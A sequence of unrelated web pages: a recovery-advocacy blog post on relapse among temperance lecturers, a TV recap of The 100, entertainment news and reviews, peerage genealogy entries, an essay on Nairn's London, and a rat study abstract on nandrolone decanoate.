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Recovery Advocacy Is Not A Recovery Program
Of all the experiences I have had as a recovery advocate, none have been more heart-rending than receiving news that a person prominently involved in recovery advocacy efforts has died of a drug overdose. It reminds me once again that personal health and recovery are the foundation of all larger efforts to educate, advocate, and counsel within the alcohol and other drug problems arena.
This is not a new lesson. Consider, for example, the following stories. John Gough got sober in the Washingtonian revival of the early 1840s, but relapsed three times in the early period of his long career as America’s most charismatic temperance reformer. The lawyer Edward Uniac always stated that he was more vulnerable to the call of alcohol during extended periods of rest than when he was moving from town to town giving his temperance lectures. But Uniac suffered repeated drinking episodes and died in 1869 of an overdose of whiskey and opium while on a temperance lecture tour in Massachusetts. Luther Benson tried to use his own personal struggles with alcohol in the temperance lectures he gave across the country. His tales of continued binge drinking while on the lecture circuit were penned while he was residing in the Indiana Asylum for the Insane. His 1896 autobiography was entitled, Fifteen Years in Hell. Benson truly believed that throwing himself into temperance work could quell his own appetite for alcohol. In retrospect, he was forced to admit the following:
I learned too late that this was the very worst thing I could have done. I was all the time expending the very strength I so much needed for the restoration of my shattered system.
The stories of Gough, Uniac, and Benson are not unique. Similar tales were told by others who sought to cure themselves on the temperance lecture circuit. However, recovering people did achieve and maintain stable recovery working in the 19th century temperance movement and within treatment institutions of that era. An important lesson emerged out of the 19th century recovery movements: service activity, by itself, does not constitute a solid program for continued sobriety. This lesson was relearned throughout the 20th century, particularly within the modern rise of addiction counseling as a distinct profession.
A New Recovery Advocacy Movement is spreading across America and beyond, leaving in its wake new grassroots recovery advocacy organizations and a fresh generation of recovering people and their families seeking new ways to carry a message of hope to those still suffering. To prepare themselves, this new generation would do well to review the stories of old. The enduring message in all of these stories is clear: Working as an addictions educator, advocate, or counselor does not constitute a program of personal recovery. Those who forget that lesson court injury to themselves and to the very movements to which they claim allegiance. The key to effective recovery advocacy is first and foremost the primacy of personal recovery.
Post Date June 2, 2017 by Bill White
Tags recovery advocacy | relapse
Next Post The Drunkard’s Club
Previous Post Life in Recovery from Addiction in Canada
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The 100 3x04: Watch the Thrones
Saturday, February 13, 2016 / The Fangirl Initiative / 1 comment
The episode opens in Polis where Lexa has gathered a council to oversee a hearing. Whose hearing? I wondered, too, until they brought a shackled Nia, the Queen of Azgeda, into the room.
Me: Wait, what?
Me: Nia is like...untouchable.
Me: How on earth did they capture her.
Me: How did this happen.
Me: They're going to tell us, right?
Me: You don't just have a free, ruling Nia and then BOOM, a captured Nia without showing us how it was done.
Except yes, that's exactly what happened. Nia is brought into the room with no explanation. Did she come willingly? It doesn't look like it. Was it a trap deliberately set by her? That would have been great, but no. It's just a regular hearing for a mysteriously captured queen.
Clarke, as the representative of the Thirteenth Clan, is present at the hearing; as is Prince Roan, under heavy guard. [I interrupt myself to state that Polis has the most awesome costuming I've seen yet in this show. Everything is stunning. Not to mention the hair + makeup stylists are doing a really bang-up job.]
Nia proves defiant, telling Lexa she does not recognize Clarke as a legitimate ambassador, until Lexa informs Nia that Skykru and Trikru are now one. Nia then moves for a vote of no confidence, and every Clan ambassador votes to depose Lexa - except Clarke.
Nia invokes a fight to the death, and Lexa accepts.
Nia: TO FIGHT IN MY STEAD, I CHOOSE....
Roan: Don't do it
Nia: MY SON, ROAN.
Roan: Wow.
Roan: Gee thanks, mom.
Titus tells Lexa to choose someone to fight in her stead, but she insists on doing it herself. Clarke doubts the intelligence of this plan and tells Lexa, "I saw Roan kill three people in the time it took for the first body to hit the ground."
Me: THAT'S MY BOY! :')
In fact, Clarke is suddenly so concerned about Lexa that she seeks out Roan, practicing before the fight, and tries to win some protection for Lexa. She tells him he would be a better Azgeda ruler than Nia, and he doesn't argue - but he also states that his people don't want him back. Still, they devise a plan to get rid of Nia and secure Roan's rule...
...which doesn't exactly go over the way they wanted it to. Clarke approaches Nia in her tent and offers to switch sides, even cutting her hand open like Azgeda vows require. But Nia's second, a girl who has been viewing Clarke with suspicion, runs forward just as Nia prepares to seal the deal and shows how Nia would have been poisoned had she gone through with it.
Nia cuts open her second's hand and smears black blood over Clarke's face, then sends her back to Lexa as a warning.
Lexa tells Clarke that Nia's second was a Nightblood, much like the children Lexa herself has been training. They carry black blood in their veins, and their heritage goes back to 'the beginning' (i.e. apparently, they're special).
Clarke tells Lexa she won't attend the fight to the death, and they exchange a good-bye.
I have to give kudos to the fight scene between Roan and Lexa - the choreography and cinematography were impressive, and it's the best fight sequence we've had yet in the show.
[Fun Fact: The sequence only took eight hours to film, and Alycia Debnam-Carey (Lexa) laughed over how much Zach McGowan (Roan) had to ease up when fighting her just so he didn't actually kill her. Awwww.]
Lexa wins the fight. And I have to say, it looked a little too easy there at the end. She knocked Roan down, and yet it almost looked like he gave up. I don't know whether that was a glitch in the choreography because they ran out of good ideas or if it's to be addressed next episode.
Nia, extremely unhappy with her son's loss, screams that if he dies now, he won't die a Prince of Azgeda - he'll just die a coward. Thanks again, Mom.
Here we have a surprisingly good move on Lexa's part. She stands above Roan with her spear poised to kill him. "Blood must have blood," she says and throws the spear at Nia, killing the Queen of Azgeda instantly.
"The Queen is dead," Lexa declares amid the shock. "Long live the King."
Me: KING ROAN.
Me: KING ROAN YYYEEESSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS.
Me: Okay. Rothenpill did good. Now please don't mess it up.
Meanwhile, back at Arkadia, Bellamy is struggling with Gina's death. The memorial for those killed at Mount Weather is interrupted as angry Farm Station soldiers, upon discovering Lexa's protective army camped outside, attack Lincoln. Pike and Kane settle things down temporarily, and Lincoln does not press charges, but the Farm Station newcomers are furious at the 'threat' outside their walls. Kane and Abby reassure everyone that the soldiers are under Indra's command and are a peacekeeping force only, but Pike and Farm Station view it as a trap.
Pike preys on Bellamy's wounded vulnerability and forms a bond with him before asking Bellamy to acquire ten guns so they can go kill all the Grounders.
Me: Don't even think about it.
Me: Your freckles and your puppy dog eyes cannot save you, Bellamy.
Me: BELLAMY, BE SENSIBLE.
Bellamy: I'll do it.
Me: [SCREECHING]
Pike and his small army sneak toward the gates at night, armed and ready, but Lincoln and Octavia bar the way and raise the alarm. Kane shows up, and Pike tells his men to lower the guns peacefully, but Kane has them locked until further notice.
As Bellamy is taken away, he starts to raise a chant - "Pike! Pike! Pike!" - and everyone joins in. MUCH TO EVERYONE'S SURPRISE (Read: we saw this coming from three hundred miles away), Pike is voted Chancellor the next morning, and Kane relinquishes his command.
While this is happening, Monty and Jasper take a very uncomfortable and emotionally painful trip to Dropship where Jasper drinks alcohol and is bitter, and Monty - very Not Okay with the fact Jasper is walking around with Finn's ashes in a jar - gives him the lecture he deserves and leaves. Jasper spills Finn's ashes accidentally and cries. Ack.
We've known since the first S3 promo aired that Bellamy would have a difficult time this season (because the last two have been so easy on him, ahahahaha). But my biggest beef is the way he's being written.
Everything about Arkadia this episode was rushed, especially where Bellamy is concerned. At the start of the season, he's searching for Clarke alongside Indra, and now, within the span of four episodes, he's supposedly Anti-Grounder (be they friend or foe) and perfectly okay with gunning three hundred of their allies down. This is horrible, horrible writing. This is the kind of character change that needs to take place over an entire season - not over four episodes. It makes Bellamy look weak, which he is not; and it makes him look stupid, which he is not. It's wrecking all his previous character development because they're rushing the story line, and I'm not okay with it.
Usually, my biggest beef with the show is Clarke but not this time. This time it's Bellamy, and the way he's being forced into a place that does not suit him. It could possibly suit him in say, season four, IF you spent ALL of season three DEVELOPING this side of him. But that didn't happen.
So, looking at Jason Rothenpill, I move for a vote of no confidence.
NO HEDA NO MO.
Do you like the direction the show is heading, or are you concerned (like me)?
Mirriam Neal, recaps, The 100, the CW, TV
The Fangirl Initiative
The Fangirl Initiative is a collection of contributors dedicated to talking about the things we love. From TV recaps to gif-filled lists, this is your daily dose of stories and fandom.
Arielle Melody Bailey February 19, 2016 at 6:51 PM
*chants* No Heda No Mo. Get Rothenpill out of the Heda chair.
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Published On: Tue, Nov 15th, 2016
Movies | By Stephen Nevets
‘Walking Dead’ star Danai Gurira discusses ‘Black Panther’ training
While Wakanda was introduced in Captain America: Civil War with Chadwick Boseman’s T’Challa aka Black Panther, the upcoming solo film will dive into the character in more interesting and exciting ways.
Joining Boseman is The Walking Dead star Danai Gurira as Okoye, Now, Gurira discusses the film, crediting her time as Michonne on the AMC series as helping her with the upcoming fighting work she’ll be doing on Black Panther.
“I’m training right now for Black Panther, and, yes, there’s a lot of ways that they’re extremely different,” she tells Comicbook.com, comparing Okoye and Michonne, but may be similar in combat styles.
“There’s a lot of ways that, yes, one helps another. There are things about using combat that help each other. Absolutely. There’s a lot of new things to learn and I’m really enjoying. There’s so much new. She’s a whole ‘nother thing.”
Okoye is the leader of the Dora Milaje, the group of skilled women who are charged with being the Black Panther’s personal bodyguards. Whether it’s fighting with a blade or a firearm, these warriors are extremely adept at neutralizing opponents and keeping their king safe, notes Comic Book.
“So even though Danai Gurira will be exploring new spaces with her Marvel character, her combat experience on The Walking Dead will help with the movie’s big action sequences. T’Challa may be the movie’s main hero, but Okoye will ideally have plenty of opportunities to show why she was recruited to protect Wakanda’s ruler. As a fun tidbit, Gurira also revealed that director Ryan Coogler (Creed) cast her not because of her work on The Walking Dead (he hasn’t even seen the TV series), but because of her performance in an independent movie called Mother of George.”
Boseman reprises his T’Challa role with Lupita Nyong’o as Nakia, Michael B. Jordan as Erik Killmonger, Winston Duke as M’Baku and Forest Whitaker as Zuri. Andy Serkis is also expected to have a role after a brief intro in Age of Ultron.
Black Panther is expected to begin production in January 2017, and will arrive into theaters on February 16, 2018.
On the DISPATCH: Headlines Local Opinion
/ ( mm / dd ) [ALL INFO CONFIDENTIAL]
Stephen Nevets - Stephen is a contributor and writer on The Dispatch. Stephen is the founder and editor for the Steven Spielberg Fan Club website and contributes to pop culture stories on The Dispatch, especially upcoming movie news. Beginning in 2016, Stephen took the role of Managing Editor for the Tampa Dispatch.
Andy SerkisAvengers Age of UltronBlack PantherBlack Panther filmChadwick BosemanComic Book MoviesCreedDanai GuriraForest WhitakerLupita Nyong'oMarvel StudiosMichael B JordanRyan CooglerSuperhero MoviesThe Walking DeadWalking DeadWinston Duke
Oscar Award winning ‘An American in Paris’ returning to cinemas to kickoff 2020 TCM Series
Jeremy Camp biopic ‘I Still Believe’ set for March 20
Ricky Gervais crushes leftist Hollywood elites, Slate says he’s ‘Just Plain Mean’
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New Release Review - HOTEL ARTEMIS
Various criminals seek refuge at a Los Angeles hotel.
Review by Musanna Ahmed
Directed by: Drew Pearce
Starring: Jodie Foster, Sterling K. Brown, Sofia Boutella, Jeff Goldblum, Brian Tyree Henry, Jenny Slate, Zachary Quinto, Charlie Day, Dave Bautista
Welcome to the Hotel Artemis, a members-only secret lair for criminals in a pickle during a tumultuous period of future Los Angeles, torn apart by riots. The criminals are given respite in a safe space where the rules are no guns, no cops and no killing other patients. Quite obviously, the narrative of Hotel Artemis descends into one where the characters break those rules. The double crossings and bizarre tactics of the kooky characters may have been easily predictable if it all wasn't such a mess to follow.
Drew Pearce, the writer/director, has crafted a crazy universe with several terrific actors who all bring various pleasures to the ensemble. It’s a pleasure in itself to see Sterling K. Brown in his first leading role in a film. He brings the goods as Sherman, a smart thief who quickly robs a bank with a few fellows (one of whom is played by Atlanta favourite Brian Tyree Henry) and bounces out straight to the Hotel where he’s admitted by Jean Thomas aka the Nurse, the fearless but agoraphobic healer and leader embodied by the legendary Jodie Foster, perfectly cast as the conflicted character.
Another scene-stealer is Dave Bautista, who, with each film, threatens to steal the thunder of Dwayne Johnson and John Cena as the WWE star with the most talent as a professional actor, or at least the one carving a Hollywood career with the most interesting choices (even if they aren’t all Blade Runner 2049). Charlie Day shows range as Acapulco, a criminal with a mind full of all the “isms” and an unfiltered mouth to spout them, a role so diabolical to the point where he’s unrecognisable as the naturally likeable actor we all know. Sofia Boutella continues her hot streak of kicking ass, and rounding up the cast are a game Zachary Quinto, Jenny Slate and Jeff Goldblum, all of them holding their own opposite the icon of cinema that is Foster.
Like many depictions of the future, the characters go by unusual names - The Wolf King, Honolulu, Nice, P-22 - except in this case those are all code names based on the suite of the hotel they occupy. Also, like in many depictions of the future, graffiti looks to be the primary form of protest. Pearce doesn’t add anything new in his vision of American dystopia except that ordinary pistols look like present-day flare guns. The future has seldom played out so confusingly, though. The nonsensical plot is hard to follow, tracking several characters and each of their stories, then tracking them navigating their present-day circumstances, and their ever-changing relationships with each other, making it almost impossible to connect with any of them.
There’s an absence of satisfaction in Hotel Artemis as an action picture too. Is it plenty of action that constitutes what an action film is or are a few big sequences enough, as in this movie? Due to the divorce of plot and intrigue, there’s a dearth of audience engagement in between Hotel Artemis’ admittedly well-choreographed punching and shooting scenes, at least until the satisfyingly chaotic third act where total mayhem commences and the rules are violently thrown out of the window. Hotel Artemis is sort of an inferior descendant of John Wick, with the hotel traded for a hospital.
Maybe the point isn’t to say something new about the future, or even tell a story that makes sense. Pearce bleeds with ideas and it’s just easier to simply sit back and let the bright colours and big action and hot-headed criminals assault our senses. The sad thing is that, overall, it leaves us cold at the end, despite the attempts at drawing our tears through deaths that affect some of the genuinely sympathetic individuals in the nefarious world.
Hotel Artemis is in UK/ROI cinemas July 20th.
Labels: By Musanna Ahmed, New Releases
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Dr. John Cooper Wilkinson1
M, #4411
Last Edited=1 Jul 2003
Child of Dr. John Cooper Wilkinson
Captain Gordon Cooper Wilkinson+1 d. 7 Jun 1966
[S8] BP1999 volume 1, page 57. See link for full details for this source. Hereinafter cited as. [S8]
unknown son Wilkinson1
M, #4412, b. after 1918
unknown son Wilkinson was born after 1918.1 He is the son of Captain Gordon Cooper Wilkinson and Mary Dorothy Low.1
unknown daughter Wilkinson1
F, #4413, b. after 1918
unknown daughter Wilkinson was born after 1918.1 She is the daughter of Captain Gordon Cooper Wilkinson and Mary Dorothy Low.1
Josias II Prinz von Waldeck-Wildungen
Last Edited=6 Mar 2007
Josias II Prinz von Waldeck-Wildungen gained the title of Prinz von Waldeck-Wildungen.
Child of Josias II Prinz von Waldeck-Wildungen and Wilhelmine Christine von Nassau-Siegen
Charlotte Joanna von Waldeck-Wildungen+ b. 13 Dec 1664, d. 1 Feb 1699
William Alington, 1st Baron Alington of Killard1
M, #4415, b. 14 March 1610/11, d. circa October 1648
Last Edited=11 Nov 2014
Consanguinity Index=0.01%
William Alington, 1st Baron Alington of Killard was baptised on 14 March 1610/11 at Horseheath, Cambridgeshire, EnglandG.1 He was the son of Sir Giles Alington and Lady Dorothy Cecil.1 He married Elizabeth Tollemache, daughter of Sir Lionel Tollemache, 2nd Bt. and Hon. Elizabeth Stanhope, before 1 October 1631.1 He died circa October 1648.1 He was buried on 25 October 1648 at Horseheath, Cambridgeshire, EnglandG.1
He was created 1st Baron Alington of Killard, co. Cork [Ireland] on 28 July 1642.1 He lived at Great Wymondley, Hertfordshire, EnglandG.1 He lived at Horseheath, Cambridgeshire, EnglandG.1
Children of William Alington, 1st Baron Alington of Killard and Elizabeth Tollemache
Hon. Catherine Alington+2
Hon. Diana Alington2
Hon. unknown Alington2
Hon. Elizabeth Alington+3 b. 1632, d. c 27 Oct 1691
William Alington, 3rd Baron Alington of Killard+4 b. b 1641, d. 1 Feb 1684/85
Giles Alington, 2nd Baron Alington of Killard5 b. bt 1641 - 1648, d. c Mar 1659/60
Hildebrand Alington, 5th Baron Alington of Killard4 b. 3 Aug 1641, d. 11 Feb 1722/23
[S6] G.E. Cokayne; with Vicary Gibbs, H.A. Doubleday, Geoffrey H. White, Duncan Warrand and Lord Howard de Walden, editors, The Complete Peerage of England, Scotland, Ireland, Great Britain and the United Kingdom, Extant, Extinct or Dormant, new ed., 13 volumes in 14 (1910-1959; reprint in 6 volumes, Gloucester, U.K.: Alan Sutton Publishing, 2000), volume I, page 106. Hereinafter cited as The Complete Peerage.
[S22] Sir Bernard Burke, C.B. LL.D., A Genealogical History of the Dormant, Abeyant, Forfeited, and Extinct Peerages of the British Empire, new edition (1883; reprint, Baltimore, Maryland: Genealogical Publishing Company, 1978), page 4. Hereinafter cited as Burkes Extinct Peerage.
[S6] Cokayne, and others, The Complete Peerage, volume XI, page 641.
[S6] Cokayne, and others, The Complete Peerage, volume I, page 108.
Sir Giles Alington1
M, #4416, b. circa 1572, d. circa 20 December 1638
Sir Giles Alington was born circa 1572.2 He was the son of Giles Alington and Margaret (?).2 He married, firstly, Lady Dorothy Cecil, daughter of Thomas Cecil, 1st Earl of Exeter and Dorothy Neville, before 1601.1 He married, secondly, Dorothy Dalton, daughter of Michael Dalton and Mary Elrington, on 2 December 1630 at West Wratting, Cambridgeshire, EnglandG.2 He died circa 20 December 1638. He was buried on 23 December 1638 at Horseheath, Cambridgeshire, EnglandG.1
In 1631 he was censured and fined £32,000 in the Star Chamber for marrying his neice by the half-blood, and did penance.2 On 7 January 1633/34 the offenders had "pardon for incest, provided they shall not hereafter cohabit."2 He lived at Horseheath, Cambridgeshire, EnglandG.1
Children of Sir Giles Alington and Lady Dorothy Cecil
Susan Alington+3 d. c Sep 1681
Mary Alington+4 d. 1674
Giles Alington2 b. c 1601, d. Feb 1613/14
William Alington, 1st Baron Alington of Killard+1 b. 14 Mar 1610/11, d. c Oct 1648
[S15] George Edward Cokayne, editor, The Complete Baronetage, 5 volumes (no date (c. 1900); reprint, Gloucester, U.K.: Alan Sutton Publishing, 1983), volume I, page 130. Hereinafter cited as The Complete Baronetage.
[S6289] The History of Parliament Online, online http://www.historyofparliamentonline.org. Hereinafter cited as History of Parliament.
Elizabeth Tollemache1
F, #4417, d. circa April 1671
Elizabeth Tollemache was the daughter of Sir Lionel Tollemache, 2nd Bt. and Hon. Elizabeth Stanhope.1 She married, firstly, William Alington, 1st Baron Alington of Killard, son of Sir Giles Alington and Lady Dorothy Cecil, before 1 October 1631.1 She married, secondly, Hon. Sir William Compton, son of Spencer Compton, 2nd Earl of Northampton and Mary Beaumont, circa 1651.1 She died circa April 1671.1 She was buried on 14 April 1671 at Horseheath, Cambridgeshire, EnglandG.1 Her will was proven (by probate) on 17 April 1671.1
From before 1 October 1631, her married name became Alington.1 After her marriage, Elizabeth Tollemache was styled as Baroness Alington of Killard on 28 July 1642. From circa 1651, her married name became Compton.1 Her last will was dated 5 April 1669.
Children of Elizabeth Tollemache and William Alington, 1st Baron Alington of Killard
Pierette Gabrielle Maurice
F, #4418
Last Edited=18 Sep 2002
Pierette Gabrielle Maurice married Gaston Robert de Muralt on 14 February 1948 at San Francisco, California, U.S.A.G. She and Gaston Robert de Muralt were divorced on 17 September 1964.
Her married name became de Muralt.
Child of Pierette Gabrielle Maurice and Gaston Robert de Muralt
Denyse Henriette de Muralt+ b. 14 Dec 1923, d. 25 Apr 2005
Sir Lionel Tollemache, 2nd Bt.1
M, #4419, b. 1 August 1591, d. 6 September 1640
Last Edited=3 Nov 2016
Sir Lionel Tollemache, 2nd Bt. was born on 1 August 1591.2 He was the son of Sir Lionel Tollemache, 1st Bt. and Katharine Cromwell.2 He married Hon. Elizabeth Stanhope, daughter of John Stanhope, 1st Baron Stanhope of Harrington and Margaret MacWilliams, on 16 December 1612 at Saint Martin in the Fields, Westminster, London, EnglandG.3 He died on 6 September 1640 at age 49.2
He gained the title of 2nd Baronet Tollemache.1
Children of Sir Lionel Tollemache, 2nd Bt. and Hon. Elizabeth Stanhope
Sir Lionel Tollemache, 3rd Bt.+ d. 1669
Elizabeth Tollemache+1 d. c Apr 1671
Anne Tollemache+4 d. b 1685
Bridgett Tollemache+3
Susanna Tollemache3
Frances Tollemache3
John Tollemache3
Jane Tollemache+5
Catherine Tollemache+
[S15] George Edward Cokayne, editor, The Complete Baronetage, 5 volumes (no date (c. 1900); reprint, Gloucester, U.K.: Alan Sutton Publishing, 1983), volume I, page 18. Hereinafter cited as The Complete Baronetage.
[S145] George Naylor, The Register's of Thorrington (n.n.: n.n., 1888). Hereinafter cited as Registers of Thorrington.
[S15] George Edward Cokayne, The Complete Baronetage, volume III, page 203.
[S37] BP2003 volume 1, page 1072. See link for full details for this source. Hereinafter cited as. [S37]
Hon. Elizabeth Stanhope1
F, #4420, d. circa 1661
Hon. Elizabeth Stanhope was the daughter of John Stanhope, 1st Baron Stanhope of Harrington and Margaret MacWilliams.1,2 She married Sir Lionel Tollemache, 2nd Bt., son of Sir Lionel Tollemache, 1st Bt. and Katharine Cromwell, on 16 December 1612 at Saint Martin in the Fields, Westminster, London, EnglandG.3 She died circa 1661.2
From 16 December 1612, her married name became Tollemache.2
Children of Hon. Elizabeth Stanhope and Sir Lionel Tollemache, 2nd Bt.
Sir Lionel Tollemache, 3rd Bt.+4 d. 1669
Jane Tollemache+
[S130] Wikipedia, online http;//www.wikipedia.org. Hereinafter cited as Wikipedia.
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CHRISTMAN OPERA COMPANY'S DOUBLE HEADER
Rachel Barg, Sooyeon Kang, Theodore Christman, Madison Marie McIntosh, Jennifer Allenby, Alyssa Brode, and Nobuki Momma
Theodore Christman has been on our radar screen for two and a half years, since Madison Marie McIntosh performed a song cycle he wrote and accompanied at the piano. Mr. Christman writes music that is accessible and tuneful; it is anything but academic. We were very enthusiastic.
We have since heard a couple of short operas he composed which he customarily pairs with a well known opera by a "dead white male". Yesterday, at the National Opera Center, we heard two of his one-act operas--a reiteration of Adriana McMannes and a new opera entitled A Metamorphosis.
The first is is an Upstairs/Downstairs tale in which a widower falls in love with his daughter's governess. The obstacle to their marriage is the widower's mother-in-law who spreads ugly gossip about the governess' mental stability. Fortunately she is made to retract her words and the tale has a happy conclusion.
A new director, Mark Watson, has changed the tone of the work and pushed it in the direction of over-the-top comedic melodrama, with exaggerated gestures. Marvelous mezzo-soprano Madison Marie McIntosh gamely gave the director what he asked for with no sacrifice of her prodigious vocal skills. She was particularly excellent with the coloratura work in the second act, in which she batted her eyelashes in time with the trill. Her love duets with the miscast tenor Kevin Courtemanche produced some lovely harmonies.
Reprising her role as Mrs. Fowler was Sarah Knott, a very different sort of mezzo-soprano who relished her role as the mother-in-law from hell. Soprano Eugenia Forteza made a fine showing as the disagreeable Mrs. Tonti who employed Adriana.
The flaw in the work was Anna Winslow's libretto. The story seems to belong to a different epoch, one in which the rumor of mental illness might lead to ostracism and when a woman making an overture toward a man would be shocking. We couldn't help thinking of Britten's comedy Albert Herring, the libretto of which is also "old fashioned" but consistent, whereas this libretto is uneven in tone. Furthermore, many of the words seemed tortured into submission in order to fit the vocal line, especially in the recitativi. Mr. Christman's music deserves better!
The second work on the program, A Metamorphosis, also seemed burdened by an anachronistic and awkward libretto. A woman named Arinyae (mezzo-soprano Rachel Barg) runs a theater named Shadowland as a sort of commune, providing food and shelter to homeless teens, in exchange for their services as actors and artists.
The framing device was a lonely old woman named Juniper who is reflecting back on her youth as a part of this group. In this role, Ms. McIntosh used bodily gesture as well as vocal color to portray both the elderly woman and the teenager she recalls. Her singing was exceptional.
But the story is muddled with an unnecessary sub-plot about the members of the group dealing drugs by delivering paintings to Buzzman, the owner of a lamp store played by Mr. Courtemanche, who was more believable in this role than he was as a romantically inclined widower.
One of the members of the group named Peter (sung by the fine baritone Nobuki Momma) falls in love with the daughter of an insect-obsessed drug addict client (bass baritone Sean Kroll); her name is Clover (bright voiced soprano Alyssa Brode) and she joins the theater commune as well, to the dismay of Juniper who also loves Peter.
There is also an overdose by Soka (soprano Jennifer Allenby) and Ariyae's death with the theme of soul possession. Does this sound like too many threads for a one-act opera? It did to us! A retrospective view of the 60's is a great idea but this tale did not succeed.
The piano score was played to perfection by Music Director Marijo Newman. We do not know whether Mr. Christman has orchestrated the works but that would surely be something to look forward to. We would like to see his music get the libretto it deserves.
We acknowledge that the libretti we heard yesterday did rhyme and scan, which is admirable, but they were clunky and often unsingable. We think a one-act opera should focus on a simple story and be told clearly. English is spoken in short phrases that are "punchy"; it is difficult to be lyrical in English. Broadway lyricists seem to have mastered the art. So should opera lyricists!
(c) meche kroop
Labels: Alyssa Brode, Christman Opera Company, Eugenia Forteza, Jennifer Allenby, Madison Marie McIntosh, Marijo Newman, Mark Watson, Nobuki Momma, Rachel Barg, Sarah Knott, Sooyeon Kang, Theodore Christman
WIE WUNDERBAR!
DRAGUS MAXIMUS--a Homersexual Opera Odyssey
HOW YA' LIKE THEM APPLES?
OPERA IS ALIVE AND WELL
OPERA TO DIE FOR
FIRST LIEDERABEND OF THE SEASON
COURTESANS AND THE MEN WHO LOVE THEM
FRIDAY NIGHT DATE WITH MOZART
EARLY HALLOWEEN
JOY AND MORE JOY IN SINGING
SHAINA MARTINEZ SINGS TURINA
BARE OPERA GALA
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Rick Poynor | Essays
On My Shelf: Nairn’s London
Nairn's London by Ian Nairn, published by Penguin Books, 1966. Design: Michael Norris. Photograph: Dennis Rolfe
Architecture writers go into raptures over Nairn’s London. Its author, the British architecture critic Ian Nairn, was a cult figure among contributors to Blueprint magazine, where I worked in the 1980s. The paperback, published by Penguin in 1966, is hard to find. Perhaps its original owners still can’t bear to part with it.
I have a copy of Nairn’s book Outrage (1959), a precocious howl of pain at the coming of the “suburban utopia” he called Subtopia, first published as a special issue of The Architectural Review — I wrote about it in Icon magazine a few years ago. But somehow I just never got around to tracking down a copy of Nairn’s London.
Then, last year, browsing in a secondhand bookshop — after my last post it must sound like I do nothing else — I found a copy of the book at a giveaway price. The spine was slightly creased and curved from regular use, but its condition, for a cheap paperback now 45 years old, was excellent. I had never seen the cover before. Credited to Michael Norris, it is an iconic piece of 1960s graphic design, with a brash hint of Pop, featuring a Routemaster bus that immediately brings to mind Alan Fletcher’s ad for Pirelli slippers from 1962. It appears to be Nairn himself in the driver’s seat.
I don’t propose to discuss Nairn’s writing at length here. It is as exceptional as everybody says (City of Sound has a fine recent post on the book; and see this appreciation.). Nairn displays a wonderful grasp of the way a building reacts with its setting. Not an architect himself, he writes about the whole knotty, complicated scene. His prose is informal, witty, amusing, argumentative, absolutely sure in judgement, immensely supple yet always precise. He takes great pleasure in what he sees — in the very process of seeing — and appears to miss nothing that matters. There is a longish entry on the area where I live; the essential sights remain much as he found them. Who knows how many (or few) times Nairn visited, but he captures the riverside scene panoramically with greedy eyes that hoover up every atmospheric detail, every peculiarity, every moment of quality or interest that deserves to be singled out and savored. He has a boundless zest for the endlessly variegated, infinitely complex, profoundly consoling, lived-in fabric of a place.
St Mary Woolnoth. Photograph: W.J. Toomey
The book, designed by Arthur Lockwood, is a model of the considerate craft at which Penguin excelled: proportionate, gracefully simple, still effortlessly readable. There is a well of 89 photographs in the middle, most of them by Nairn, which record a London that was disappearing into memory even as he set it down on the page with unchecked, devil-may-care passion. “[London] is burning again,” he writes, thinking back to the not-so-distant Blitz, “but this time only to satisfy developers’ greed, planners’ inadequacy and official stupidity. We must put out the fires and start healing this great place with the love and understanding it needs.”
Death masks of Henry VII and Elizabeth of York, Westminster Abbey. Photographs: Eric de Mare
Georgian Holborn — and its inhabitants. Photographs: Ian Nairn
Lodge Road Power Station, St John’s Wood. Photograph: Ian Nairn
South Croydon Power Station from Beddington Lane, and Holly Lodge, Highgate. Photographs: Ian Nairn
Nairn’s London ends with a postscript about London beer, an enthusiasm Nairn pursued with the same immoderate thirst for experience and flavor he brought to the delectation of architecture and the city. He died too soon in 1983, at the age of 52. This classic, idiosyncratic guidebook’s final, breezy salute — “Good drinking!”
Posted in: Architecture, Media, Photography, Social Good
Rick Poynor is a writer, critic, lecturer and curator, specialising in design, photography and visual culture. He founded Eye, co-founded Design Observer, and contributes columns to Eye and Print. He is Professor of Design and Visual Culture at the University of Reading in the UK.
More from Rick Poynor
Herbert Spencer and The Book of Numbers
The Book of Numbers by Herbert and Mafalda Spencer was aimed at children, but its intriguing visual approach is more “photobook” than “schoolbook.”
The Never-ending Struggle against Clutter
Clutter and design are inseparable as concepts because clutter is the negation of design.
Exposure: Andy’s Food Mart by Tibor Kalman and M&Co
The virtue of the vernacular
The Art of Punk and the Punk Aesthetic
Punk has two graphic histories: Punk: An Aesthetic and The Art of Punk. What conclusions do they draw?
Exposure: License Photo Studio by Walker Evans
The building as camera
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Zahedan Journal of Research in Medical Sciences The Official Journal of Zahedan University of Medical Sciences
All Issues Current Issue Back Issues In Press Articles
Chronic High Doses of Nandrolone Decanoate on Blood Cell, Lipoprotein Profile, and Liver Enzymes in Male Rats
Mohammad Reza Shahraki 1 , * , Hamideh Mirshekari 2 , Ahmad Reza Shahraki 2
1 Department of Physiology, Faculty of Medicine, Zahedan University of Medical Sciences, Zahedan, IR Iran
2 Zahedan University of Medical Sciences, Health Service Center, Zahedan, IR Iran
* Corresponding author: Mohammad Reza Shahraki, Department of Physiology, Faculty of Medicine, Zahedan University of Medical Sciences, Zahedan, IR Iran. E-mail: [email protected]
How to Cite: Shahraki M R, Mirshekari H, Shahraki A R. Chronic High Doses of Nandrolone Decanoate on Blood Cell, Lipoprotein Profile, and Liver Enzymes in Male Rats, Zahedan J Res Med Sci. 2016 ; 18(6):e7365. doi: 10.17795/zjrms-7365.
Zahedan Journal of Research in Medical Sciences: 18 (6); e7365
Received: January 6, 2015
Accepted: May 14, 2015
DOI : 10.17795/zjrms-7365
Background: Nandrolone decanoate (ND) is a doping agent and it is used by athletes.
Objectives: This study was carried out to evaluate the chronic, high doses of ND administration on Blood cell, lipid profile, and Liver enzymes in male rats.
Materials and Methods: This experiment was executed on 30 wistar- Albino male rats divided, after weighing, in control, placebo, and test groups (n = 10). Test group received 15 mg/kg intramuscular (IM) ND for duration of 8 weeks. Group placebo received the same volume of placebo although control group did not receive any agent during the trial period. At the end, animals were anesthetized by diethyl ether, scarified, and then blood samples were collected from cervical vessels immediately. Blood cell, lipoprotein profile, and liver enzymes were measured by ordinary methods. Obtained data were analyzed by SPSS V. 15, via ANOVA and Tukey test. Results were expressed as mean ± SD. Statistical difference was significantly recognized by P ≤ 0.05.
Results: Results showed that AST, ALT, cell blood count, hemoglobin, hematocrite, and cholesterol values in group test were increased significantly compared to those of other groups; however, HDL value in this group decreased noticeably compared to control and Placebo groups.
